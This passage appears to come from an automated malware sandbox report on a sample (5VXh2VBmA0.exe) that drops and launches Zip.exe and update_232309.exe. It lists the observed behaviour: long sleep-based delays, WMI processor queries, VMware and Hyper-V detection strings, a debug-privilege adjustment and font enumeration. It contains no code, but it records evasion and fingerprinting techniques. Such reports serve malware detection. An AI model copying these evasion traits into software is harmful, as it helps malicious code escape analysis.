                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe TID: 244Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exe TID: 5764Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exe TID: 5764Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exe TID: 4488Thread sleep time: -17524406870024063s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exe TID: 6068Thread sleep count: 6029 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exe TID: 6076Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exe TID: 324Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exe TID: 3520Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exe TID: 3520Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exe TID: 5996Thread sleep count: 9483 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Newtonsoft.Json.dllJump to dropped file
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeDropped PE file which has not been started: C:\Users\user\Desktop\Newtonsoft.Json.dllJump to dropped file
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeWindow / User API: threadDelayed 9125Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeWindow / User API: threadDelayed 9398Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeWindow / User API: threadDelayed 6029Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeWindow / User API: threadDelayed 9483Jump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_processor
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_processor
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_processor
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_processor
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_processor
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_processor
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_processor
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_processor
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.547892509.000000001E657000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f50<
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.524251422.0000000000D99000.00000004.00000020.00020000.00000000.sdmp, Zip.exe, 0000000A.00000002.367509411.00000176E46DB000.00000004.00000020.00020000.00000000.sdmp, update_232309.exe, 0000000B.00000002.352143455.0000000001077000.00000004.00000020.00020000.00000000.sdmp, update_232309.exe, 0000000C.00000002.388502206.0000000000F65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeMemory allocated: page read and write | page guardJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeProcess created: C:\Users\user\AppData\Local\Temp\Zip.exe "C:\Users\user\AppData\Local\Temp\Zip.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Users\user\Desktop\5VXh2VBmA0.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
